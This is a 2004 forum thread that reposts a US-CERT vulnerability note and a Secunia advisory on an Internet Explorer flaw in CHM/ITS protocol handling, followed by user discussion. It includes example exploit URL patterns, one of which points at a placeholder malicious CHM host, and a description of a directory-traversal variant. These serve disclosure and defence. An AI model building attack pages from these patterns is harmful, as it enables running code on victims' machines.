US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)

CERT ^ | 04/05/2004 | Art Manion

[Salo]

Vulnerability Note VU#323070 Microsoft Internet Explorer does not properly validate source of CHM components referenced by ITS protocol handlers Overview Microsoft Internet Explorer (IE) does not adequately validate the source of script contained in compiled help (CHM) file components that are referenced by the Microsoft InfoTech Storage (ITS) protocol handlers. An attacker could exploit this vulnerability to execute script in different security domains. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. I. Description The Cross Domain Security Model

IE uses a cross-domain security model to maintain separation between browser frames from different sources. This model is designed to prevent code in one domain from accessing data in a different domain. The Local Machine Zone is "...an implicit zone for content that exists on the local computer. The content found on the user's computer, except for content that Internet Explorer caches on the local system, is treated with a high level of trust."

HTML Help

The Microsoft HTML Help system "...is the standard help system for the Windows platform." HTML Help components can be compiled to "...compress HTML, graphic, and other files into a relatively small compiled help (.chm) file...". The resulting compiled Help (CHM) file can then "...be distributed with a software application, or downloaded from the Web." The Help Viewer application "...uses the underlying components of Microsoft Internet Explorer to display help content. It supports HTML, ActiveX, Java, scripting languages (JScript, and Microsoft Visual Basic Scripting Edition)...".

The InfoTech Storage Format

CHM files use the Microsoft InfoTech Storage format (ITS). IE can access components within CHM files (via the IStorage interface) using several protocol handlers: ms-its, ms-itss, its, mk:@MSITStore.

For example, the following URL references an HTML file within a CHM file hosted on a remote web site:

ms-its:http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html

This URL references a local CHM file:

ms-its:file://c:\directory\path\compiledhelpfile.chm:/htmlfile.html

MIME Encapsulation of Aggregate HTML Documents (MHTML)

MHTML (RFC 2110) provides a way to include multiple components of an HTML document (HTML, images, script, etc.) in a single MIME email message. The ITS protocol handlers can also reference objects contained within MHTML documents:

ms-its:mhtml:file://c:\directory\path\mhtmlfile.mhtml

The ITS protocol handlers can specify an alternate location for MHTML content (URL is wrapped):

ms-its:mhtml:file://c:\file_does_not_exist.mhtml!http://www.example.com/directory/ path/compiledhelpfile.chm:/htmlfile.html

The Problem

If an ITS protocol handler is unable to access the specified MHTML file, the handler will attempt to access the content specified by the alternate location. The ITS protocol handlers incorrectly treat HTML content from one domain (htmlfile.html in example.com) as if it were in a different domain (file://, the Local Machine Zone). This is a violation of the cross-domain security model. Limited testing shows that the ms-its, its, and mk:@MSITStore protocol handlers are vulnerable.

An attacker could exploit this vulnerability using a crafted HTML document containing script or an ActiveX object or possibly an IFRAME element. Due to the way IE determines the MIME type of a file referenced by a URL, an HTML document may not necessarily have the expected file name extension (.html or .htm). Likewise, a CHM file may not have the expected .chm extension.

Functional exploit code is publicly available, and there are reports of systems being compromised via this vulnerability (Ibiza trojan).

Any program that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Outlook and Outlook Express are affected. II. Impact By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. The attacker could also read or modify data in other web sites (read cookies/content, modify/create content, etc.). III. Solution There is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.

Note: Disabling Active scripting or ActiveX controls is not an effective workaround

Disabling Active scripting and ActiveX controls in any zone does not prevent the exploitation of this vulnerability. Disabling these features in the Internet and Local Machine Zones may stop some attacks.

Disable ITS protocol handlers

Disabling ITS protocol handlers may prevent exploitation of this vulnerability. Rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its, its, mk}

Modifying the Windows registry in this way may have unintended consequences. On Windows XP and ME, disabling the ITS protocol handlers will reduce the functionality of the Help and Support Center (HSC).

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. US-CERT maintains a partial list of antivirus vendors.

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References

[Salo]

Beware.

[Salo]

Pinging the Penguin Pinger and other interested parties.

[Support Free Republic]

Donate Here By Secure Server

[CDHart]

Can you or someone please translate this for me?

Carolyn

[lilylangtree]

Thank you.

[sigSEGV]

One of many. Not sure if its going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).

[sigSEGV]

Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.

[TechJunkYard]

Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.

[Salo]

This is the secunia advisory for the same problem:

Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07

http://secunia.com/advisories/10523/

Critical:
Highly critical
Impact: Security Bypass

Where: From remote

Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6

Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exists two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.

Use another product.

Provided and/or discovered by:
Originally reported by Arman Nayyeri.

Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.

Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/

US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070

[rdb3]

The Penguin Ping.

Wanna be Penguified? Just holla!

Got root?

[zeugma]

This bears repeating:

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References

[PAR35]

This bears repeating:

Use a different web browser

In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.

[amigatec]

This bears repeating:

Use a different web browser

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

[ninenot]

Earlier, when I first opened this thread, my Norton interecpted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"

You dont' think you're sending this, do you?

[CDHart]

Thank you!

Carolyn

[zeugma]

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)

[AFreeBird]

Surprise, Surprise, Surprise...

[AFreeBird]

Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.

[CyberCowboy777]

Now that is a ironic pic!

I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.

A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?

I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).

[CyberCowboy777]

I personally cannot stand my browser and email mixed so I run Firefox at home, but still is not in a place for me to install it on my clients systems.

You must remember that many of the exploits of IE are because of the features of IE. Feature we use everyday that seem simple but when you are use to them it is hard to do without.

I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)